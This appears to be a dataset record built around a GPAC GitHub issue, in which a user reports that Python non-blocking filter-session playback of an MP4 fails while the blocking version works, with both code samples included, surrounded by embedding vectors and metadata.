-0.009287787601351738, -0.01021357998251915, 0.010422629304230213, 0.0012953625991940498, -0.005696609150618315, 0.01245339959859848, 0.0053307716734707355, 0.010825796984136105, 0.00009233425225829706, 0.007802039850503206, -0.021696390584111214, 0.007372741121798754, 0.008488918654620647, 0.0032402731012552977, 0.0012123025953769684, 0.0036005107685923576, 0.023294128477573395, -0.00028604367980733514, 0.001640668255276978, -0.015574215911328793, 0.004378848243504763, 0.02392127923667431, 0.00006871114601381123, 0.013745029456913471, -0.004166065249592066, 0.004632694646716118, 0.014738015830516815, -0.009519235230982304, 0.0035837122704833746, -0.018754759803414345, 0.017037564888596535, 0.0010405831271782517, 0.0009033941314555705, -0.0009939201408997178, 0.009071271866559982, 0.009646158665418625, 0.0063946861773729324, -0.007006904110312462, 0.010743670165538788, 0.021397748962044716, 0.008085750974714756, 0.011594802141189575, -0.0006187502876855433, -0.016679193824529648, -0.014805210754275322, 0.013483717106282711, -0.005532355513423681, 0.00026947836158797145, 0.0038860877975821495, -0.0019299783743917942, 0.0001578373194206506, 0.0012477664276957512, 0.03371675685048103, -0.004804414231330156, -0.014947066083550453, -0.0001539876393508166, 0.013483717106282711, 0.011370819993317127, 0.0029490964952856302, 0.010407697409391403, 0.013267201371490955, 0.01708236150443554, -0.00634242407977581, -0.0038524905685335398, -0.013267201371490955, 0.016186432912945747, -0.013102947734296322, 0.005618215538561344, 0.01702263206243515, 0.01137828640639782, -0.018202271312475204, 0.010445027612149715, 0.008862221613526344, -0.002844571601599455, -0.00401674397289753, 0.019770145416259766, -0.023533042520284653, 0.007988691329956055, 0.017903627827763557, 0.01745566539466381, 0.01010905485600233, -0.005633147433400154, 0.025339830666780472, -0.02342851832509041, 0.007477266248315573, 0.003188010537996888, -0.017097294330596924, -0.016231229528784752, 0.009519235230982304, -0.0009453907259739935, -0.0028240398969501257, -0.005005998071283102, 0.010571951046586037, 0.004864142742007971, -0.00042043288704007864, 0.02435431070625782, 0.00004890857235295698, 0.023518111556768417, -0.007996157743036747, 0.009347516112029552, -0.007204754743725061, -0.0022323541343212128, -0.004531902726739645, 0.0037666307762265205, 0.006958374287933111, -0.010265842080116272, -0.0019430438987910748, -0.012065164744853973, -0.006570138968527317, 0.01570860482752323, 0.006865048781037331, 0.007958827540278435, 0.007055433467030525, 0.013416522182524204, 0.018874216824769974, 0.02030770294368267, -0.011676928959786892, -0.03249232470989227, 0.011788919568061829, 0.00340825947932899, 0.0006551473634317517, -0.0047372193075716496, 0.016858378425240517, -0.015006794594228268, 0.014618558809161186, 0.007298080716282129, -0.010273308493196964, 0.0004612629418261349, 0.008914483711123466, -0.03141720965504646, 0.005696609150618315, -0.01142308209091425, 0.008921950124204159, 0.007787107955664396, -0.006159505341202021, 0.002971494570374489, -0.005278509575873613, 0.026340285316109657, -0.010773534886538982, 0.0006668131100013852, 0.014461771585047245, -0.0010265841847285628, -0.02472761459648609, 0.00648801214993, -0.0044721742160618305, 0.008615841157734394, -0.025235306471586227, 0.00621176790446043, 0.014431907795369625, -0.0133717255666852, -0.028550241142511368, -0.01582806184887886, 0.005685409996658564, -0.0052001154981553555, 0.006726926192641258, 0.012416069395840168, -0.006439482793211937, 0.019008606672286987, 0.016947971656918526, -0.0010583150433376431, 0.010385299101471901, 0.007921497337520123, 0.017261546105146408, -0.007757243700325489, -0.025175578892230988, -0.005140386987477541, 0.00044469762360677123, -0.012139825150370598, 0.0014456171775236726, -0.012535526417195797, 0.019501367583870888, 0.01797829009592533, 0.01588779129087925, -0.021218562498688698, -0.030013589188456535, -0.029879199340939522, -0.02484707161784172, -0.006469347048550844, 0.008235071785748005, 0.01220701914280653, 0.001468015369027853, -0.004614029545336962, -0.010071724653244019, 0.01969548501074314, 0.008578510954976082, 0.007357809226959944, -0.012513128109276295, 0.0013000288745388389, -0.013020820915699005, 0.0035706465132534504, 0.011019915342330933, 0.0010265841847285628, 0.02310001105070114, 0.012916295789182186, -0.015424894168972969, -0.008466520346701145, -0.021860644221305847, 0.005823532119393349, 0.01358824223279953, -0.0186502356082201, 0.0002809107827488333, -0.000005100111138744978, -0.027415398508310318, 0.019142996519804, -0.018754759803414345, -0.005722740199416876, 0.008503850549459457, -0.008414257317781448, -0.009541633538901806, 0.007145026233047247, 0.009653625078499317, 0.001140441745519638, 0.023174671456217766, -0.008459053933620453, -0.032761100679636, -0.0015370765468105674, -0.003901019925251603, -0.004404979757964611, 0.021338019520044327, -0.002954696072265506, 0.017231682315468788, 0.01800815388560295, -0.004139934200793505, 0.014797745272517204, -0.009131000377237797, -0.015529419295489788, 0.0004250991914886981, 0.009123533964157104, 0.003641574177891016, -0.003598644398152828, 0.0011376419570297003, 0.002937897341325879, 0.013468785211443901, 0.02257738634943962, 0.0005641547031700611, 0.0034829203505069017, -0.009056339040398598, -0.002751245629042387, -0.004419911652803421, 0.001437217928469181, 0.00105644844006747, -0.011430548503994942, -0.00845158752053976, -0.0053307716734707355, -0.002213688800111413, 0.016753854230046272, 0.018336661159992218, -0.0029864266980439425, -0.005565952975302935, -0.01585792563855648, -0.008996610529720783, -0.018321728333830833, -0.01591765508055687, -0.02168145775794983, -0.005928057245910168, -0.010430095717310905, -0.00048249459359794855, 0.016425346955657005, 0.0066224015317857265, 0.0013970878208056092, -0.01254299283027649, -0.006327491719275713, -0.014917202293872833, -0.011094575747847557, -0.01570860482752323, 0.013506115414202213, 0.006364821922034025, -0.030342096462845802, -0.00025641274987719953, 0.02607150562107563, -0.00792896281927824, -0.015133718028664589, 0.0026448541320860386, -0.010153851471841335, 0.008197741582989693, -0.018948877230286598, 0.0026560532860457897, -0.023413585498929024, 0.005502491258084774, 0.005024663172662258, 0.022801369428634644, 0.008668104186654091, 0.011482811532914639, -0.001530543784610927, 0.0008945281733758748, 0.014566296711564064, 0.017440732568502426, 0.003148813731968403, 0.012333942577242851, 0.011773987673223019, -0.007604189217090607, 0.002586992224678397, 0.009362448006868362, 0.0165298730134964, 0.01661946438252926, -0.009496836923062801, 0.0012580322800204158, 0.015103853307664394, 0.00816041138023138, 0.00155667494982481, 0.007831904105842113, 0.005741405766457319, 0.005577152129262686, -0.0012944294139742851, -0.0019001140026375651, 0.005308373831212521, -0.00262245605699718, 0.0033149337396025658, -0.004531902726739645, -0.00944457482546568, 0.001834785914979875, 0.0035613139625638723, -0.002545928815379739, 0.020352499559521675, 0.008391859009861946, -0.010691408067941666, 0.02144254371523857, -0.004636427387595177, 0.002865103306248784, -0.0018403854919597507, -0.005726473405957222, -0.029431236907839775, 0.010086656548082829, -0.014932134188711643, 0.033358387649059296, 0.014536432921886444, 0.011438014917075634, -0.01748552918434143, -0.010616747662425041, -0.00204756879247725, 0.0032962686382234097, 0.0002753112348727882, -0.04052581265568733, -0.011400684714317322, 0.003031223313882947, 0.0024134062696248293, 0.0021651594433933496, -0.004072739742696285, -0.011833716183900833, 0.006626134272664785, 0.003398926928639412, -0.00881742499768734, -0.005222513806074858, 0.012057698331773281, -0.0008721299818716943, 0.008152944967150688, 0.010288240388035774, 0.022338472306728363, 0.013214938342571259, -0.018202271312475204, 0.010198647156357765, -0.01153507363051176, 0.03302988037467003, -0.005498758517205715, -0.008108148351311684, -0.02481720596551895, 0.021875577047467232, -0.0004894940066151321, 0.009750683791935444, 0.015320369973778725, -0.030819924548268318, 0.00452443677932024, 0.0032178747933357954, 0.005625681485980749, -0.006286428309977055, 0.015111319720745087, -0.01012398675084114, 0.0018385190051048994, -0.004289255477488041, 0.01576833426952362, 0.013207472860813141, -0.004628961440175772, -0.001329893129877746, -0.0003751698532141745, 0.0011628399370238185, 0.016664260998368263, 0.005241178907454014, -0.00486787548288703, -0.004882807843387127, -0.011385751888155937, 0.0035911782179027796, -0.0007545393891632557, -0.010482357814908028, 0.015544351190328598, 0.015424894168972969, 0.010795933194458485, -0.02760951593518257, 0.008608375675976276, 0.002187557751312852, 0.014170595444738865, -0.014327382668852806, -0.027504991739988327, 0.012737110257148743, -0.009004076942801476, -0.003938350360840559, 0.006323758978396654, -0.007943895645439625, -0.0028949675615876913, -0.008578510954976082, -0.013715164735913277, -0.008093216456472874, 0.013364260084927082, 0.0025160645600408316, -0.00045403020340017974, 0.02112896926701069, 0.03201449662446976, -0.00001713403980829753, 0.01423032395541668, -0.018814489245414734, 0.017799103632569313, -0.008869688026607037, 0.007533261552453041, -0.0138644864782691, 0.000764338590670377, 0.02849051170051098, -0.004632694646716118, 0.0025403292383998632, 0.023204537108540535, -0.013282133266329765, 0.002754978835582733, 0.0038338254671543837, -0.0027008496690541506, 0.0075743249617516994, 0.0020792996510863304, 0.009287787601351738, 0.0010863126954063773, 0.014006341807544231, -0.00020904987468384206, -0.011452946811914444, -0.0032421397045254707, 0.01102738082408905, 0.010527154430747032, 0.016261093318462372, 0.017037564888596535, 0.010131453163921833, 0.00026247891946695745, 0.016888244077563286, 0.0025067320093512535, -0.004740952514111996, -0.007137560285627842, 0.0067493245005607605, 0.01629095897078514, 0.010527154430747032, 0.005498758517205715, -0.00906380545347929, -0.021203629672527313, 0.004061540588736534, -0.0033503975719213486, -0.009183262474834919, 0.0016434680437669158, 0.00739140622317791, 0.00211289688013494, 0.0054166316986083984, -0.0021427611354738474, 0.006002717651426792, 0.0038972869515419006, -0.0019449105020612478, -0.021830780431628227, -0.00878756120800972, 0.012692313641309738, 0.024891868233680725, -0.006678396835923195, -0.0000022966905817156658, -0.012505662627518177, 0.007182356435805559, -0.029849335551261902, -0.01281923707574606, 0.02330906130373478, -0.0037666307762265205, -0.0031898771412670612, 0.009668556973338127, -0.006040048319846392, 0.0019430438987910748, 0.003477320773527026, -0.0049835997633636, -0.002620589453727007, 0.027519922703504562, 0.0282217338681221, -0.016201365739107132, 0.0010303172748535872, -0.001381222391501069, -0.013073083013296127, -0.01415566261857748, 0.025220373645424843, 0.0019393109250813723, -0.00015562082990072668, 0.001965442206710577, -0.021517205983400345, 0.002510464983060956, 0.010795933194458485, -0.009944801218807697, 0.004151133354753256, -0.013311997056007385, -0.010482357814908028, -0.0013448253739625216, -0.017843900248408318, -0.015439826995134354, 0.021636663004755974, -0.008444122038781643, 0.010542086325585842, -0.02781856618821621, -0.010026928037405014, -0.01283416897058487, 0.013185074552893639, 0.013088015839457512, -0.014536432921886444, -0.0006523476331494749, -0.016947971656918526, -0.0373004712164402, 0.012610186822712421, 0.023816753178834915, 0.0173660721629858, -0.012490729801356792, 0.002073700074106455, -0.005883260630071163, 0.003382128430530429, -0.011079643853008747, -0.001524010905995965, 0.0017470596358180046, -0.007981225848197937, 0.02380182221531868, -0.002641121158376336, -0.005957921501249075, 0.021830780431628227, 0.01658960059285164, 0.005491292104125023, -0.00640961853787303, 0.0020606345497071743, 0.0005454895435832441, 0.0006192169385030866, -0.004972400609403849, -0.011251362971961498, 0.011542540043592453, -0.023577839136123657, -0.015200912021100521, 0.002148360712453723, 0.004072739742696285, -0.00986267440021038, 0.003606110345572233, 0.019949331879615784, -0.0009229925344698131, 0.002372342860326171, 0.005050794221460819, 0.007719913497567177, 0.0067567904479801655, -0.004550567828118801, -0.011871046386659145, 0.0176647137850523, -0.01257285661995411, 0.005872061476111412, -0.00568914320319891, 0.0006336824153549969, -0.016664260998368263, -0.0035426488611847162, 0.00973575096577406, 0.0007816039142198861, -0.01335679367184639, -0.011228964664041996, 0.016365619376301765, -0.016335753723978996, 0.008250003680586815, -0.003251472255215049, 0.01102738082408905, 0.012304078787565231, -0.0020046390127390623, -0.004296721424907446, 0.01609683968126774, -0.0005492225755006075, 0.023936210200190544, -0.003270137356594205, 0.004729753360152245, -0.025817660614848137, -0.011139372363686562, 0.01754525676369667, -0.0073391436599195, -0.010392765514552593, 0.008869688026607037, -0.03529956564307213, -0.022831233218312263, 0.026429876685142517, 0.030192775651812553, 0.010116521269083023, 0.014349780976772308, -0.004057807382196188, 0.0018982475157827139, 0.0034623886458575726, 0.008929416537284851, 0.011557471938431263, 0.013662902638316154, -0.0019337113481014967, 0.015544351190328598, 0.01025837566703558, -0.017814036458730698, -0.006069912575185299, 0.0531882606446743, 0.02033756673336029, 0.013379191979765892, 0.00763778667896986, 0.0022528856061398983, 0.013155209831893444, -0.010041859932243824, -0.001530543784610927, -0.02193530462682247, 0.006402152590453625, 0.006950908340513706, 0.019038470461964607, 0.0005585551261901855, -0.0082649365067482, -0.007014370057731867, 0.003020024159923196, -0.00713009387254715, 0.008399325422942638, -0.009885072708129883, -0.013110414147377014, -0.011191634461283684, -0.012953625991940498, 0.019859738647937775, -0.015335301868617535, 0.0004766617203131318, 0.006726926192641258, 0.006271496415138245, -0.03198463097214699, -0.00014838807692285627, -0.013379191979765892, 0.026549333706498146, -0.021054308861494064, -0.01217715535312891, 0.005211314652115107, 0.0033391984179615974, 0.01464842353016138, 0.015454758889973164, 0.015409962274134159, -0.0014185527106747031, -0.007645252626389265, -0.010863127186894417, 0.023592771962285042, -0.004180997610092163, 0.0186502356082201, 0.0069994376972317696, 0.007861768826842308, -0.005969120655208826, 0.01116176974028349, 0.01363303791731596, 0.008384393528103828, 0.010206113569438457, 0.010579416528344154, 0.003180544590577483, -0.009175796061754227, 0.004681224003434181, 0.0021072973031550646, 0.0015016127144917846, -0.012408602982759476, -0.004106336738914251, -0.020785531029105186, -0.008496384136378765, -0.01530543714761734, -0.0204271599650383, -0.006305093411356211, -0.03422445058822632, -0.0026355215813964605, -0.000769004924222827, 0.010840728878974915, -0.01748552918434143, 0.032402731478214264, -0.003027490107342601, -0.004920138046145439, -0.02281630039215088, 0.0066858627833426, -0.011019915342330933, -0.007891632616519928, 0.023846618831157684, 0.0031357482075691223, -0.008951813913881779, 0.008123081177473068, 0.004027943126857281, -0.012341408990323544, 0.016634397208690643, -0.009937334805727005, 0.005005998071283102, -0.002129695611074567, -0.005838464479893446, -0.012856567278504372, -0.011848648078739643, 0.023413585498929024, 0.014805210754275322, -0.000778337474912405, -0.031267888844013214, -0.014028740115463734, 0.012289145961403847, -0.014081002213060856, 0.006891179829835892, 0.00003461805317783728, 0.013715164735913277, 0.007369007915258408, -0.011602268554270267, 0.013311997056007385, -0.028445715084671974, -0.004729753360152245, 0.0058981929905712605, 0.012886431999504566, 0.010400230996310711, -0.017306342720985413, -0.006883713882416487, -0.011311091482639313, 0.01996426284313202, 0.007555659860372543, -0.0005716207670047879, 0.008608375675976276, 0.012117426842451096, -0.014304984360933304, -0.010280773974955082, 0.012744576670229435, 0.016649330034852028, -0.0018926479388028383, 0.012356340885162354, -0.013565843924880028, 0.015073989517986774, 0.025504084303975105, 0.005868328735232353, -0.01296109240502119, 0.010041859932243824, 0.02953576110303402, 0.002258485183119774, -0.006838917266577482, -0.00800362415611744, 0.0027251143474131823, 0.02499639242887497, -0.0039906129240989685, -0.0181574746966362, 0.01806788146495819, -0.008974212221801281, 0.0028221732936799526, 0.01742579974234104, -0.001325226854532957, 0.02717648446559906, 0.02401087060570717, -0.01190091110765934, 0.028699561953544617, -0.015320369973778725, 0.009004076942801476, -0.01929231733083725, 0.014021273702383041, -0.007981225848197937, -0.01812761090695858, 0.009795479476451874, 0.01395407970994711, 0.002853904152289033, 0.0032738703303039074, -0.005147853400558233, 0.0017255947459489107, 0.02395114302635193, 0.015992315486073494, -0.010452494025230408, -0.013901816681027412, -0.00986267440021038, 0.012431001290678978, 0.011221499182283878, 0.0067343926057219505, 0.003923418000340462, 0.0056368806399405, 0.0013896217569708824, -0.015409962274134159, 0.01220701914280653, -0.01332692988216877, -0.01748552918434143, -0.021636663004755974, -0.002538462867960334, -0.020113583654165268, 0.008929416537284851, 0.0016201365506276488, 0.014469237998127937, -0.006753057707101107, 0.008384393528103828, -0.003122682450339198, 0.00434151804074645, 0.0055472878739237785, -0.013730097562074661, 0.017276478931307793, 0.043542101979255676, 0.008511316031217575, 0.0018562509212642908, 0.004625228699296713, 0.008720366284251213, -0.0037031692918390036, -0.00830973219126463, -0.0067493245005607605, 0.0016481343191117048, 0.005872061476111412, -0.005360635928809643, 0.026146166026592255, 0.00002949971349153202, 0.0011908377055078745, 0.024518564343452454, -0.009519235230982304, 0.010355435311794281, -0.03401540219783783, -0.014640957117080688, 0.004039142280817032 ]
321
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Video file https://www.mediafire.com/file/17ozreaf7xzflk4/thai-boxer.mp4/file (yes, that boxer, again). So, following the instructions in the HowTos, I am trying to create a Python video player, and it looks like that the non blocking mode is not working. This is the blocking version of the code, it works properly ``` import sys sys.path.append('/usr/share/gpac/python') import libgpac as gpac gpac.init() fs = gpac.FilterSession() f1 = fs.load_src("thai-boxer.mp4") # the boxer file f2 = fs.load("vout") f3 = fs.load("aout") fs.run() ``` This non-blocking version does not. ``` import sys sys.path.append('/usr/share/gpac/python') import libgpac as gpac opts = []; gpac.init() opts.append("-no-block") gpac.set_args(opts) fs = gpac.FilterSession(gpac.GF_FS_FLAG_NO_MAIN_THREAD) f1 = fs.load_src("thai-boxer.mp4") # the boxer file f2 = fs.load("vout") f3 = fs.load("aout") while True: print("step") #call session fs.run_step() #if last task, GPAC session is done if fs.last_task: break ``` Bug present on 91d397ddce227a2559bb9b16528c8087e5425961 (master HEAD at the present time) I hear a sound makes a brief pop, no video plays back, the break happens after 8 steps. Bug happening on Ubuntu 20.04, Python 3.8.10 Here is the full log if you ever need it [non-blocking.log](https://github.com/gpac/gpac/files/6881184/non-blocking.log)
Python: Non-blocking mode not working
https://api.github.com/repos/gpac/gpac/issues/1864/comments
3
2021-07-26T20:39:57
2021-08-04T20:32:02Z
https://github.com/gpac/gpac/issues/1864
953,269,692
1,864
false
This is a GitHub Issue repo:gpac owner:gpac Title : Python: Non-blocking mode not working Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ Video file https://www.mediafire.com/file/17ozreaf7xzflk4/thai-boxer.mp4/file (yes, that boxer, again). So, following the instructions in the HowTos, I am trying to create a Python video player, and it looks like that the non blocking mode is not working. This is the blocking version of the code, it works properly ``` import sys sys.path.append('/usr/share/gpac/python') import libgpac as gpac gpac.init() fs = gpac.FilterSession() f1 = fs.load_src("thai-boxer.mp4") # the boxer file f2 = fs.load("vout") f3 = fs.load("aout") fs.run() ``` This non-blocking version does not. ``` import sys sys.path.append('/usr/share/gpac/python') import libgpac as gpac opts = []; gpac.init() opts.append("-no-block") gpac.set_args(opts) fs = gpac.FilterSession(gpac.GF_FS_FLAG_NO_MAIN_THREAD) f1 = fs.load_src("thai-boxer.mp4") # the boxer file f2 = fs.load("vout") f3 = fs.load("aout") while True: print("step") #call session fs.run_step() #if last task, GPAC session is done if fs.last_task: break ``` Bug present on 91d397ddce227a2559bb9b16528c8087e5425961 (master HEAD at the present time) I hear a sound makes a brief pop, no video plays back, the break happens after 8 steps. Bug happening on Ubuntu 20.04, Python 3.8.10 Here is the full log if you ever need it [non-blocking.log](https://github.com/gpac/gpac/files/6881184/non-blocking.log) --- end body ---
2,240
[ 0.00829537957906723, 0.02659652568399906, -0.011559369042515755, 0.022776659578084946, -0.009207585826516151, 0.00463586300611496, -0.01579257845878601, 0.0416194312274456, -0.022391824051737785, 0.015550273470580578, -0.015065663494169712, 0.02358909510076046, 0.010497502982616425, -0.022277796640992165, -0.004422064404934645, 0.029988793656229973, -0.00813146773725748, 0.038426704704761505, -0.00477483170107007, -0.016847316175699234, 0.027522986754775047, -0.021892961114645004, -0.017759524285793304, 0.018857022747397423, -0.013611833564937115, 0.0031464004423469305, -0.020952247083187103, 0.010789694264531136, -0.007860655896365643, -0.04398546740412712, -0.030216846615076065, 0.024073705077171326, -0.018871275708079338, 0.057354994118213654, 0.05775408446788788, -0.01527946162968874, 0.03859774395823479, 0.022448835894465446, 0.011680521070957184, 0.007058911956846714, -0.039196379482746124, -0.0078677823767066, -0.0321267805993557, -0.0049066743813455105, -0.03574709966778755, 0.019184846431016922, -0.005505309905856848, 0.020481890067458153, -0.01978348195552826, -0.03152814507484436, 0.049230653792619705, 0.0008828093996271491, -0.015550273470580578, -0.0142318494617939, -0.001025341683998704, -0.06590693444013596, 0.028235647827386856, -0.03802761435508728, 0.0030341562815010548, 0.006221534684300423, 0.009264598600566387, 0.02683883160352707, -0.02636847458779812, 0.021622149273753166, 0.00048015566426329315, 0.009193332865834236, -0.027066882699728012, 0.015749817714095116, -0.003980214241892099, 0.019598189741373062, -0.003515202784910798, -0.013041704893112183, 0.005555196199566126, 0.014994396828114986, 0.03782806918025017, -0.05866629257798195, 0.03312450647354126, 0.042560141533613205, -0.01329826284199953, -0.01771676354110241, -0.05476090684533119, -0.0047962116077542305, -0.02777954377233982, 0.020681435242295265, 0.003183815162628889, 0.022719647735357285, -0.009535410441458225, -0.057469021528959274, -0.02116604521870613, 0.017930561676621437, 0.03363762050867081, 0.02353208139538765, 0.00023116955708246678, -0.023403802886605263, 0.006506599020212889, -0.009599549695849419, -0.020182572305202484, -0.00260121445171535, -0.05290798842906952, -0.02016831934452057, -0.006987645756453276, -0.05102656036615372, -0.024159222841262817, -0.012941932305693626, 0.027936330065131187, 0.011773167178034782, 0.03742897883057594, -0.00917907990515232, 0.029475677758455276, 0.1160212904214859, 0.00747581897303462, -0.02760850451886654, 0.03831268101930618, -0.017531471326947212, -0.009813348762691021, 0.033466581255197525, -0.01579257845878601, 0.03882579505443573, -0.0025174766778945923, -0.005900837015360594, 0.023275524377822876, -0.003965961281210184, -0.03717242181301117, 0.022135265171527863, -0.04464111477136612, 0.035889632999897, -0.02642548643052578, 0.015749817714095116, -0.0540197379887104, -0.013405161909759045, -0.025698572397232056, -0.004913800861686468, -0.0186004638671875, -0.041704948991537094, 0.009799094870686531, -0.009763462468981743, -0.047548774629831314, 0.014295988716185093, -0.004853224381804466, -0.001423541223630309, -0.05855226516723633, -0.03386567160487175, 0.04193300008773804, -0.015863845124840736, -0.027594251558184624, -0.003766415873542428, 0.007796516641974449, -0.00975633505731821, -0.019598189741373062, 0.017046861350536346, -0.02403094433248043, -0.03777105733752251, 0.007319033145904541, 0.0026600088458508253, 0.029418665915727615, -0.005768994800746441, 0.015079916454851627, 0.010811074636876583, -0.013034578412771225, -0.0016872260021045804, -0.012941932305693626, -0.020439131185412407, 0.01329826284199953, -0.016305694356560707, -0.0036737697664648294, -0.022933445870876312, 0.009421384893357754, 0.034378789365291595, -0.02140835113823414, 0.010789694264531136, -0.0265395138412714, -0.0017237499123439193, -0.006756030488759279, 0.05057045817375183, -0.047748319804668427, -0.024016691371798515, 0.013341022655367851, 0.031870219856500626, -0.015450500883162022, 0.01650523953139782, -0.010846707969903946, -0.01750296540558338, -0.021237311884760857, -0.00445769727230072, 0.029119348153471947, -0.005918653681874275, 0.0349489189684391, -0.025228215381503105, -0.015906604006886482, 0.006791663821786642, 0.012991818599402905, -0.010461870580911636, 0.018272640183568, -0.032639894634485245, -0.014695079065859318, 0.00201148702763021, -0.014638066291809082, -0.009086433798074722, -0.025370748713612556, 0.013219870626926422, -0.022520102560520172, -0.013198490254580975, -0.018258387222886086, -0.03141411766409874, -0.03777105733752251, 0.03497742488980293, -0.015607286244630814, 0.0629422590136528, 0.0029379469342529774, -0.03161366283893585, 0.009079307317733765, -0.03534800931811333, -0.017816536128520966, -0.009635183028876781, -0.03312450647354126, 0.0031410553492605686, -0.006549358833581209, 0.02217802405357361, -0.018044589087367058, -0.024216236546635628, -0.011217291466891766, 0.006570738740265369, -0.014766345731914043, -0.012906298972666264, -0.03315301239490509, 0.008630330674350262, 0.027765290811657906, -0.0021237311884760857, -0.001509951427578926, -0.017645498737692833, 0.02736620046198368, -0.0009514030534774065, -0.009043673984706402, 0.021693415939807892, -0.004393558017909527, 0.035918138921260834, 0.0018368848832324147, 0.0025584546383470297, 0.010169679298996925, -0.006495909299701452, 0.0173319261521101, 0.0390823557972908, -0.020909488201141357, -0.008872635662555695, 0.0015473662642762065, 0.04159092158079147, 0.006937759462743998, 0.0390823557972908, 0.014046557247638702, -0.002752654952928424, -0.03722943365573883, -0.006538669113069773, -0.01810160093009472, -0.023959677666425705, -0.017189394682645798, 0.01077544130384922, 0.011609255336225033, -0.02405945025384426, 0.004703565500676632, -0.040878262370824814, -0.025912370532751083, -0.0024889700580388308, -0.03255437687039375, 0.021508123725652695, 0.010020020417869091, -0.006331996992230415, -0.0002957545220851898, 0.012200764380395412, 0.02105201967060566, -0.02116604521870613, -0.013219870626926422, 0.009920247830450535, -0.03862624987959862, 0.019298871979117393, 0.0010672105709090829, 0.003459971398115158, -0.020538903772830963, -0.002554891398176551, 0.021807441487908363, 0.007019715383648872, 0.00116431072819978, 0.000548749347217381, -0.008331012912094593, 0.007596971001476049, 0.008765735663473606, 0.014160583727061749, 0.04623747617006302, -0.011516609229147434, -0.04364338889718056, 0.02105201967060566, 0.027237921953201294, 0.03281093388795853, -0.025028670206665993, 0.0298747681081295, 0.02119455114006996, 0.02509993687272072, -0.008872635662555695, -0.013162856921553612, -0.009485524147748947, -0.004226082470268011, 0.014224722981452942, 0.007532831747084856, -0.00648165587335825, -0.011260051280260086, -0.05604369938373566, -0.014246102422475815, 0.0030092131346464157, 0.02326126955449581, 0.030302366241812706, 0.005227372050285339, 0.04398546740412712, -0.052508898079395294, -0.0038519352674484253, 0.0016391213284805417, -0.0006596572929993272, 0.0030074312817305326, 0.01031933818012476, -0.0026119041722267866, -0.03443580120801926, -0.004119183402508497, 0.03053041733801365, -0.00028706894954666495, -0.004261715337634087, 0.012086738832294941, 0.0005229153321124613, -0.023631853982806206, -0.003791359020397067, -0.016747543588280678, -0.031955741345882416, -0.014246102422475815, -0.0052024289034307, -0.022833673283457756, -0.012649741023778915, -0.016391213983297348, 0.015992123633623123, -0.030815482139587402, -0.043358322232961655, -0.012108118273317814, 0.03286794573068619, -0.014980143867433071, -0.022805167362093925, -0.00897240824997425, 0.03794209659099579, -0.018044589087367058, 0.007625477854162455, -0.04449858143925667, 0.005861640442162752, 0.04313027113676071, 0.03201275318861008, -0.018472185358405113, 0.0010467214742675424, 0.053221557289361954, 0.014374381862580776, -0.021693415939807892, -0.005701291840523481, 0.010868087410926819, -0.011473849415779114, -0.018272640183568, -0.018671730533242226, 0.028891295194625854, 0.04238910228013992, -0.07052497565746307, 0.012350423261523247, 0.05074149742722511, -0.007739503402262926, -0.004831844940781593, -0.035205475986003876, -0.006096818950027227, 0.017460206523537636, 0.0014832266606390476, -0.033438075333833694, -0.02760850451886654, -0.0698978379368782, 0.005801064427942038, -0.005252315197139978, 0.011431089602410793, -0.0243302620947361, 0.014424268156290054, -0.028150128200650215, 0.012606981210410595, -0.05883733183145523, 0.007832149975001812, 0.04538228362798691, -0.03224080428481102, -0.0028185760602355003, 0.016405466943979263, -0.003351290477439761, 0.0005157887353561819, -0.044327542185783386, -0.020111307501792908, -0.00766111072152853, -0.021921467036008835, -0.03158515691757202, -0.06545083224773407, -0.03606066852807999, 0.0034118667244911194, -0.023161496967077255, -0.03127158433198929, 0.010761188343167305, -0.017645498737692833, 0.0230617243796587, -0.007689617108553648, 0.020182572305202484, 0.028349673375487328, -0.01948416419327259, 0.027152402326464653, -0.0297322366386652, -0.0020738448947668076, 0.015806831419467926, -0.006567175500094891, 0.027494478970766068, -0.03979501500725746, -0.037600018084049225, 0.043358322232961655, -0.005369903985410929, 0.04848948493599892, -0.02317575179040432, 0.006577865220606327, -0.021835947409272194, 0.008958154357969761, 0.00015255410107783973, 0.012713880278170109, 0.0014253229601308703, -0.011637762188911438, 0.010661415755748749, -0.024843377992510796, 0.012072484940290451, 0.00008306960080517456, 0.03383716568350792, -0.03318151831626892, 0.0362602137029171, -0.04372890666127205, -0.02910509519279003, -0.019298871979117393, 0.00022627001453656703, 0.003557962365448475, -0.03831268101930618, -0.004749888554215431, -0.0060683125630021095, -0.026753311976790428, -0.04977227747440338, 0.040878262370824814, 0.019854748621582985, 0.019826242700219154, 0.022919192910194397, -0.016761798411607742, -0.04623747617006302, 0.001406615599989891, 0.05450434982776642, -0.004970813635736704, 0.018415171653032303, 0.029247626662254333, 0.01620592176914215, -0.023418055847287178, -0.005006446968764067, 0.006310617085546255, 0.00006024216418154538, -0.010134045965969563, 0.02405945025384426, 0.014452774077653885, -0.004838971421122551, 0.011352697387337685, 0.01343366876244545, 0.0056834751740098, 0.003212321549654007, 0.0012409217888489366, -0.01689007692039013, -0.012051105499267578, 0.027266427874565125, -0.026753311976790428, 0.025798344984650612, 0.027266427874565125, -0.0035062944516539574, 0.03486339747905731, 0.014780598692595959, 0.019640950486063957, -0.01815861463546753, -0.02899106778204441, 0.05273694917559624, -0.026682045310735703, 0.010476123541593552, -0.04891708120703697, 0.03634573519229889, 0.01490887813270092, -0.02863473817706108, 0.009777715429663658, -0.020481890067458153, -0.022477341815829277, 0.004910237621515989, -0.015664299950003624, 